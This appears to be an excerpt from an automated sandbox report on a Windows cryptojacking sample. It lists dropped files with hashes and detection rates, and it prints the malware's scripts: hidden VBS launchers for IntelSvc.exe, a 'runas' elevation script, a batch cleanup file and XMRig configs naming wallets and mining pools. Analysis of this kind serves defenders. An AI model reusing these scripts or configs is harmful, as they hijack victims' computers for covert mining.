                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, Author: Joe Security
                                                    • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, Author: unknown
                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, Author: unknown
                                                    • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, Author: Florian Roth
                                                    • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, Author: ditekSHen
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 83%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....i.b...............&..^.......2............@.....................................T....`... ..............................................p...F.....S.....u................p...........................`.s.(.......................8............................text.....^.......^.................`..`.data... .....^.......^.............@....rdata..P....._......._.............@..@.pdata........u.......u.............@..@.xdata..@.....x.......x.............@..@.bss.... .2..`|..........................idata...F...p...H...B|.............@....CRT....h.............|.............@....tls.................|.............@....rsrc...S............|.............@....reloc..p............~.............@..B........................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):3241944
                                                    Entropy (8bit):6.300666139752175
                                                    Encrypted:false
                                                    SSDEEP:49152:RyBkRdnKQlYeEesgIMIbVSRsyMwJwTStnkoxCnKgyNOnJR:WkAe+Vm2wnndeKg5
                                                    MD5:A7CDE18F991E97037A7899B7669E2548
                                                    SHA1:0FD0B96FF150A1ECF93206C227A13148933F28CE
                                                    SHA-256:8B9F1FA5F941C7F46B65BF8929CA80D132435151E1DCB3A5DE7693B70B254467
                                                    SHA-512:1D73B9A3B8866AB9CCAC32BB97A63062D2A8C5152D83E5681EF1227B2DAB1D56CCC4D4FDB05C5FBA55A4CB27DE77592A509E1211D05F2F1811E19FDFA88FED50
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$....................Q.......Q...K...Q.........g....{;$....................b...........`......p...........w.......w.......t....w......Rich...........................PE..L...z..a.................P...X...............`....@...........................4......42...@...................................#.......1..C............/..1...P3.<...@6!.T...................87!......6!.@............`...............................text....O.......P.................. ..`.rdata..\....`.......T..............@..@.data...t.....#.......#.............@....rsrc....C....1..D...x-.............@..@.reloc..<....P3......./.............@..B........................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):14544
                                                    Entropy (8bit):6.2660301556221185
                                                    Encrypted:false
                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1072593
                                                    Entropy (8bit):6.09356912081639
                                                    Encrypted:false
                                                    SSDEEP:12288:R00eV1l1xLc8n0edZLCuKffxOW73ltrAnkUm3FhBhxahwPm6jFWNpfc8AccN4lRw:RDeV1BLci0edZL/OOW7ltCkOvX35F0h7
                                                    MD5:3C47D45F09948B8E6FDB5F96523BC60B
                                                    SHA1:A890EAAE8D5A45D54E7571C4BF780A6EB263586A
                                                    SHA-256:86BB64D0A8D548445E17D4EDEF0A0E5F97D019F3AF524FC9CD625294916C973D
                                                    SHA-512:6B67BB4268595480261FF007058F59AA4505204278B3B094551F14132E9FAF7160019B155831D9AB75D5CAB64C1AC9AD1CEB4A7B6FB5CED87E144E475A74790C
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 64%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....R.....+...............L...l................@.................................j......... .........................................................................................................................(............................text...\...........................`.P`.data...d...........................@.`..rdata.............................@.`@/4...........P.......&..............@.0@.bss.....l...p........................`..idata...............<..............@.0..CRT.................L..............@.0..tls.... ............N..............@.0./14..................P..............@.@B/29......L... ...N...R..............@..B/41..........p......................@..B/55.................................@..B/67.................................@.0B/80.....@...........................@..B/91.................................@..B/102....................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):313
                                                    Entropy (8bit):5.135981028520709
                                                    Encrypted:false
                                                    SSDEEP:6:ZDH+7ym/eMTIaHPZLACCmqMeZaHPZLA4qnLVapFIuapv1BIapv:s2MTLg9MnlqnpugHIS
                                                    MD5:2A13CDEE27030A33CF90E49F26B7B1AD
                                                    SHA1:3BB5A27AD6F24BC81AA01461F3D389CC53DB589C
                                                    SHA-256:8D53EF6F3E4FE49126BB49E112FF18813C7FB6C90E1B059746D979788F6721D2
                                                    SHA-512:68CF4A487900DB356CD84EC3D450F2F9DE6410CD110E18C962538DF93E7D94422E3BE22ABC436EA4696143EDF730E2A6317BF1750B8689C12419AD3B208E80F9
                                                    Malicious:false
                                                    Preview:DIM fso..Set fso = CreateObject("Scripting.FileSystemObject")..If (fso.FileExists("C:\Users\Public\IntelSvc.exe")) Then.. CreateObject("WScript.Shell").run "C:\Windows\System32\cmd.exe /C start /b """" ""C:\Users\Public\IntelSvc.exe"" ", 0, True.. WScript.Quit()..Else.. WScript.Quit()..End If..WScript.Quit()..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):351
                                                    Entropy (8bit):5.184871037147829
                                                    Encrypted:false
                                                    SSDEEP:6:ZDH+7ym/eMTI923f+aLACCmqMeZ923f+aLA4qnLVapFIuapv1BIapv:s2MThJg9MdJlqnpugHIS
                                                    MD5:B89E4D1C73C93C1F5EB440DD32D2E9EE
                                                    SHA1:9164AD042146C0EF70B3A59DA92BE1AD2C8F20EB
                                                    SHA-256:C132F398422167FE43AE86CA3CADCE67BE7BD33560FE42C12FFE067960A197D8
                                                    SHA-512:084AD2D043ED93964B397EC6F98268D227586DB758D0E3789D269B6A8B3A46381C01FED6D79BD1D5A76D4545A798148BD5448F671EF1AD87544100DE32F3B32D
                                                    Malicious:false
                                                    Preview:DIM fso..Set fso = CreateObject("Scripting.FileSystemObject")..If (fso.FileExists("C:\Users\user\AppData\Local\Temp\IntelSvc.exe")) Then.. CreateObject("WScript.Shell").run "C:\Windows\System32\cmd.exe /C start /b """" ""C:\Users\user\AppData\Local\Temp\IntelSvc.exe"" ", 0, True.. WScript.Quit()..Else.. WScript.Quit()..End If..WScript.Quit()..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):984
                                                    Entropy (8bit):5.179878767414784
                                                    Encrypted:false
                                                    SSDEEP:24:IYxUU9hcGhWYW88oW88GgW888W88h7rxK2t/90L:I2hcGwfvg7V1lS
                                                    MD5:BBC072CDCCF0278CC55EFAEB0EE4438F
                                                    SHA1:6BC1BF282FA17E8095466D50A0344F92C11732F5
                                                    SHA-256:0ED58E0A88055B64ED7587C645D12EDF35C9C6C4DBB7943B2BB1071DC064239B
                                                    SHA-512:AEC0958DE09DC2BDC695D405F8A9CF345465A1261F191536C7F0BD36890F0125048689CFB6B7B79708FFDA9B50EECCF6104582F3BE6450E37453BC825F083FC8
                                                    Malicious:false
                                                    Preview:@Echo off..if not "%minimized%" == "" goto :minimized1..set minimized=true..start /min C:\Windows\System32\cmd.exe /c "%~dpnx0"..goto :EOF..:minimized1..Title emd..IF EXIST "C:\Users\user\AppData\Local\Temp\screen.exe" (.."C:\Users\user\AppData\Local\Temp\screen.exe" win hide ititle "emd"..)..C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\*.*">nul 2>nul..C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\*.cmd">nul 2>nul..C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\*.vbs">nul 2>nul..C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\*.exe">nul 2>nul..C:\Windows\System32\wbem\wmic.exe process where name="Systemfont.exe" call terminate>nul 2>nul..C:\Windows\System32\schtasks.exe /delete /tn "Svtasks" /f>nul 2>nul..del /f /q "C:\Users\user\AppData\Local\Temp\Svtasks.cmd">nul 2>nul..del /f /q "C:\Users\user\AppData\Local\Temp\backmn.cmd">nul 2>nul..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):88576
                                                    Entropy (8bit):6.15492829325332
                                                    Encrypted:false
                                                    SSDEEP:1536:ufVX5SG8cD++OTJ5enxjSiXkSxf5DqWtp0XU1jDBBrjK8o3agdbx583+fs7k+nUI:O5SG7S6/7k+nUwoL1xii2l8NXQUQUlC
                                                    MD5:DDD12566B99343B96609AFA2524ECEC3
                                                    SHA1:8FEF2C2BC87EF7D135296FDB4CF9ECD9C0322D55
                                                    SHA-256:767B877E735C425BF05C34683356ABFDE4070B092F17A4741EA5AC490611F3DE
                                                    SHA-512:B11A36B25B5C34CD86C367C4003F76F360965FDBC67CA1F30AFEC3A744D419C03D70ADE2423AD6A1D2858561F732DB9F1D1A279A37B045F8A5FAA9C53DBE30BD
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 39%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....T.....................V...N................@.................................z......... .....................................................................................................................T................................text...<...........................`.P`.data...\...........................@.`..rdata..`V.......X..................@.`@.eh_fram.....p.......D..............@.0@.bss....tL............................`..idata...............H..............@.0..CRT.................V..............@.0..tls.... ............X..............@.0.................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):938
                                                    Entropy (8bit):5.57285235961628
                                                    Encrypted:false
                                                    SSDEEP:24:hDbdmeOM6p75x2iSkel575T96x7J7q7bel57536x7J7q7be9:ZhU1V5xvsP5x6BJ7q7CP536BJ7q7C9
                                                    MD5:73D059C6788D35FBF1CDC6ABD799DF52
                                                    SHA1:A6AF58E1C8EFCACC1A053E6BEA819067ACC0C8C4
                                                    SHA-256:C90CA39AE1993D6171792AE37D19768B887DB22D3912650F7E5FB938537FC77D
                                                    SHA-512:EE6057A92328E756599DFAF998081B88F56EDF486C8ADBB5EA8F7DA8B718693D502314C2260F9B1FDC7196F2033DDE7C30ABF06BAD8AB1F45655DF2599DFC9CD
                                                    Malicious:false
                                                    Preview:{.."autosave": true,.."background": true,.."title": true,.."cpu": true,.."opencl": false,.."cuda": false,.."retries": 1,.."retry-pause": 2,.."pools": [..{.."algo": "rx/0",.."coin": "XMR",.."url": "auto.c3pool.org:13333",.."user": "8Bg9mc5vUWw8dL8jCxbVda9ukMHxpisqmfCaaUDbngS8jGRS7cuRu1HC6m2dEKZW7yBpDQ3fRQtFShEDXTSbQ9pf5Tk2Sut.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..},..{.."algo": "rx/0",.."coin": "XMR",.."url": "auto.c3pool.org:443",.."user": "84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..},..{.."algo": "rx/0",.."coin": "XMR",.."url": "xmr.2miners.com:2222",.."user": "84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..}..]..}..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):264
                                                    Entropy (8bit):5.579378925177609
                                                    Encrypted:false
                                                    SSDEEP:6:e5odPXvqzm8giMafKn71g7pqfAWFZLabXx1EXYfFROMfoIj:Yo9i6x7ao71g7plWPazAYEMTj
                                                    MD5:B01A9D0151625441C4FC500F2E227439
                                                    SHA1:0F2EC5AC6C9CFE12161512FC237E39335A82BF99
                                                    SHA-256:3EE3ED71F81D848BF7978E0137F475D670EC59596870B0FFE0C6D8FC397B48D0
                                                    SHA-512:A91635B587128EDBBFE1BF65E1AF3E66AA19E422BF00FCF78175756EC82022C61AB12E2AE484C2D1389CFA1CB5915EA3D1DB73242BD7D14E74BD917B49F60D96
                                                    Malicious:false
                                                    Preview:[RandomX]..wallet = 84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T..pool1 = auto.c3pool.org:13333..pool2 = auto.c3pool.org:443..pool3 = xmr.2miners.com:2222..pool4 = xmr.GHhA5Joo.com:2222..noLog = true..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                    Category:dropped
                                                    Size (bytes):45568
                                                    Entropy (8bit):7.750275657742685
                                                    Encrypted:false
                                                    SSDEEP:768:UDR7drWxRrYJAgERvFAREX5DyzaccyOkVDIBF9K/phcanwUaajMIWCW2jsV:2A3cJAgmSRC5DcLxIBLGwUgIW2sV
                                                    MD5:A1CD6A64E8F8AD5D4B6C07DC4113C7EC
                                                    SHA1:60E2F48A51C061BBA72A08F34BE781354F87AA49
                                                    SHA-256:B994AE5CBFB5AD308656E9A8BF7A4A866FDEB9E23699F89F048D7F92E6BB8577
                                                    SHA-512:87A42901A63793653D49F1C6D410A429CABB470B4C340C4553CBD9ECCACB38D8543F85455465E0A432D737E950C590175DAD744094861F7C3E575446A65B41E8
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W..=X..W...t...W..$t...W...t...W..=X..W...W...V.....W......W......W..Rich.W..........................PE..L...-'C].........................................@.................................................................................................................................................................................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):128
                                                    Entropy (8bit):4.886801557336521
                                                    Encrypted:false
                                                    SSDEEP:3:jNJmFEm86oQ/FERMQsQJM2xAvOUkh4E2J5xAI6IPF3ypFCvn:jqNhtCMGz923fjPFCrsn
                                                    MD5:AE2417EB1062AACBD21DFCC09B0D3621
                                                    SHA1:F0A97CBCC4F11E0407993D573595B53F64B4CE74
                                                    SHA-256:5ECD6C9550FAB85D421A52F1E167708219A303B48A89788983CBC5FF0F057E73
                                                    SHA-512:6E812AF3FC92EADF0BD5F2104AA338E90AFC37102CA858A8A02BA5C10A3010BBA59CEE5E15FB1B15B58340D75CADB90DC05A30FD5685C703FF1A3774C4EE6128
                                                    Malicious:true
                                                    Preview:Set Shell = CreateObject("Shell.Application")..Shell.ShellExecute "C:\Users\user\AppData\Local\Temp\two.cmd", , , "runas", 0..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):14544
                                                    Entropy (8bit):6.2660301556221185
                                                    Encrypted:false
                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\K4gsPJGEi4.exe
                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):14544
                                                    Entropy (8bit):6.2660301556221185
                                                    Encrypted:false
                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):311
                                                    Entropy (8bit):5.165541433085838
                                                    Encrypted:false
                                                    SSDEEP:6:ZDH+7ym/eMTFLmJ/LACCmqMeWLmJ/LA4qnLVapFIuapv1BIapv:s2MTFC/g9M5C/lqnpugHIS
                                                    MD5:746BC6238EFC458BE346EA8D66D4679C
                                                    SHA1:48BE6020E39534030F5776843BD3433F57A7AD0A
                                                    SHA-256:5851AD362D81E896F45CF3DB2A1F925F04F9D9E05DB1BECE823194483884C1EB
                                                    SHA-512:E259705093B19C52464C63831CBFAA6F1ADE851AFC289BA6AE6783EFD8D051216DA038155DF5B8A44D05C9E29D13CB533687DB9B73A79793A1E64A0384A51240
                                                    Malicious:true
                                                    Preview:DIM fso..Set fso = CreateObject("Scripting.FileSystemObject")..If (fso.FileExists("C:\ProgramData\IntelSvc.exe")) Then.. CreateObject("WScript.Shell").run "C:\Windows\System32\cmd.exe /C start /b """" ""C:\ProgramData\IntelSvc.exe"" ", 0, True.. WScript.Quit()..Else.. WScript.Quit()..End If..WScript.Quit()..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):313
                                                    Entropy (8bit):5.135981028520709
                                                    Encrypted:false
                                                    SSDEEP:6:ZDH+7ym/eMTIaHPZLACCmqMeZaHPZLA4qnLVapFIuapv1BIapv:s2MTLg9MnlqnpugHIS
                                                    MD5:2A13CDEE27030A33CF90E49F26B7B1AD
                                                    SHA1:3BB5A27AD6F24BC81AA01461F3D389CC53DB589C
                                                    SHA-256:8D53EF6F3E4FE49126BB49E112FF18813C7FB6C90E1B059746D979788F6721D2
                                                    SHA-512:68CF4A487900DB356CD84EC3D450F2F9DE6410CD110E18C962538DF93E7D94422E3BE22ABC436EA4696143EDF730E2A6317BF1750B8689C12419AD3B208E80F9
                                                    Malicious:true
                                                    Preview:DIM fso..Set fso = CreateObject("Scripting.FileSystemObject")..If (fso.FileExists("C:\Users\Public\IntelSvc.exe")) Then.. CreateObject("WScript.Shell").run "C:\Windows\System32\cmd.exe /C start /b """" ""C:\Users\Public\IntelSvc.exe"" ", 0, True.. WScript.Quit()..Else.. WScript.Quit()..End If..WScript.Quit()..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):351
                                                    Entropy (8bit):5.184871037147829
                                                    Encrypted:false
                                                    SSDEEP:6:ZDH+7ym/eMTI923f+aLACCmqMeZ923f+aLA4qnLVapFIuapv1BIapv:s2MThJg9MdJlqnpugHIS
                                                    MD5:B89E4D1C73C93C1F5EB440DD32D2E9EE
                                                    SHA1:9164AD042146C0EF70B3A59DA92BE1AD2C8F20EB
                                                    SHA-256:C132F398422167FE43AE86CA3CADCE67BE7BD33560FE42C12FFE067960A197D8
                                                    SHA-512:084AD2D043ED93964B397EC6F98268D227586DB758D0E3789D269B6A8B3A46381C01FED6D79BD1D5A76D4545A798148BD5448F671EF1AD87544100DE32F3B32D
                                                    Malicious:true
                                                    Preview:DIM fso..Set fso = CreateObject("Scripting.FileSystemObject")..If (fso.FileExists("C:\Users\user\AppData\Local\Temp\IntelSvc.exe")) Then.. CreateObject("WScript.Shell").run "C:\Windows\System32\cmd.exe /C start /b """" ""C:\Users\user\AppData\Local\Temp\IntelSvc.exe"" ", 0, True.. WScript.Quit()..Else.. WScript.Quit()..End If..WScript.Quit()..
                                                    Process:C:\Users\user\Desktop\K4gsPJGEi4.exe
                                                    File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):88576
                                                    Entropy (8bit):6.15492829325332
                                                    Encrypted:false
                                                    SSDEEP:1536:ufVX5SG8cD++OTJ5enxjSiXkSxf5DqWtp0XU1jDBBrjK8o3agdbx583+fs7k+nUI:O5SG7S6/7k+nUwoL1xii2l8NXQUQUlC
                                                    MD5:DDD12566B99343B96609AFA2524ECEC3
                                                    SHA1:8FEF2C2BC87EF7D135296FDB4CF9ECD9C0322D55
                                                    SHA-256:767B877E735C425BF05C34683356ABFDE4070B092F17A4741EA5AC490611F3DE
                                                    SHA-512:B11A36B25B5C34CD86C367C4003F76F360965FDBC67CA1F30AFEC3A744D419C03D70ADE2423AD6A1D2858561F732DB9F1D1A279A37B045F8A5FAA9C53DBE30BD
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 39%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....T.....................V...N................@.................................z......... .....................................................................................................................T................................text...<...........................`.P`.data...\...........................@.`..rdata..`V.......X..................@.`@.eh_fram.....p.......D..............@.0@.bss....tL............................`..idata...............H..............@.0..CRT.................V..............@.0..tls.... ............X..............@.0.................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):264
                                                    Entropy (8bit):5.579378925177609
                                                    Encrypted:false
                                                    SSDEEP:6:e5odPXvqzm8giMafKn71g7pqfAWFZLabXx1EXYfFROMfoIj:Yo9i6x7ao71g7plWPazAYEMTj
                                                    MD5:B01A9D0151625441C4FC500F2E227439
                                                    SHA1:0F2EC5AC6C9CFE12161512FC237E39335A82BF99
                                                    SHA-256:3EE3ED71F81D848BF7978E0137F475D670EC59596870B0FFE0C6D8FC397B48D0
                                                    SHA-512:A91635B587128EDBBFE1BF65E1AF3E66AA19E422BF00FCF78175756EC82022C61AB12E2AE484C2D1389CFA1CB5915EA3D1DB73242BD7D14E74BD917B49F60D96
                                                    Malicious:false
                                                    Preview:[RandomX]..wallet = 84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T..pool1 = auto.c3pool.org:13333..pool2 = auto.c3pool.org:443..pool3 = xmr.2miners.com:2222..pool4 = xmr.GHhA5Joo.com:2222..noLog = true..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):938
                                                    Entropy (8bit):5.57285235961628
                                                    Encrypted:false
                                                    SSDEEP:24:hDbdmeOM6p75x2iSkel575T96x7J7q7bel57536x7J7q7be9:ZhU1V5xvsP5x6BJ7q7CP536BJ7q7C9
                                                    MD5:73D059C6788D35FBF1CDC6ABD799DF52
                                                    SHA1:A6AF58E1C8EFCACC1A053E6BEA819067ACC0C8C4
                                                    SHA-256:C90CA39AE1993D6171792AE37D19768B887DB22D3912650F7E5FB938537FC77D
                                                    SHA-512:EE6057A92328E756599DFAF998081B88F56EDF486C8ADBB5EA8F7DA8B718693D502314C2260F9B1FDC7196F2033DDE7C30ABF06BAD8AB1F45655DF2599DFC9CD
                                                    Malicious:false
                                                    Preview:{.."autosave": true,.."background": true,.."title": true,.."cpu": true,.."opencl": false,.."cuda": false,.."retries": 1,.."retry-pause": 2,.."pools": [..{.."algo": "rx/0",.."coin": "XMR",.."url": "auto.c3pool.org:13333",.."user": "8Bg9mc5vUWw8dL8jCxbVda9ukMHxpisqmfCaaUDbngS8jGRS7cuRu1HC6m2dEKZW7yBpDQ3fRQtFShEDXTSbQ9pf5Tk2Sut.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..},..{.."algo": "rx/0",.."coin": "XMR",.."url": "auto.c3pool.org:443",.."user": "84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..},..{.."algo": "rx/0",.."coin": "XMR",.."url": "xmr.2miners.com:2222",.."user": "84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..}..]..}..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):109
                                                    Entropy (8bit):5.052672311769047
                                                    Encrypted:false
                                                    SSDEEP:3:eAub7Kxe4GW9ZsFsGfuOUkh4E2J5xAIXR1WbAFX0y:eAubUeRWIFP923fXIAt0y
                                                    MD5:41EC60ED91E6BE04A431D9DA74F4B5DF
                                                    SHA1:41B0CF3F453E536BF78ED49AAAC08AA1201778A2
                                                    SHA-256:08121F9DE2F0ACAAC4A711E9DD82E044E40FBFA8C05E4144AF16E18D7D61C708
                                                    SHA-512:BAF5B56C75C5FF565A57135763DEFEC914020C2E8994ACF96DE0F480B76939AB877D2F521D177F74EF0A6DC3719EAD73988469F8FA25D3A6B0D7555E22A52B6E
                                                    Malicious:true
                                                    Preview:Type Nul>C:\Windows\System32\V_Test1.txt..del /f /q "C:\Users\user\AppData\Local\Temp\est1.cmd">nul 2>nul..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):129
                                                    Entropy (8bit):4.872156751820885
                                                    Encrypted:false
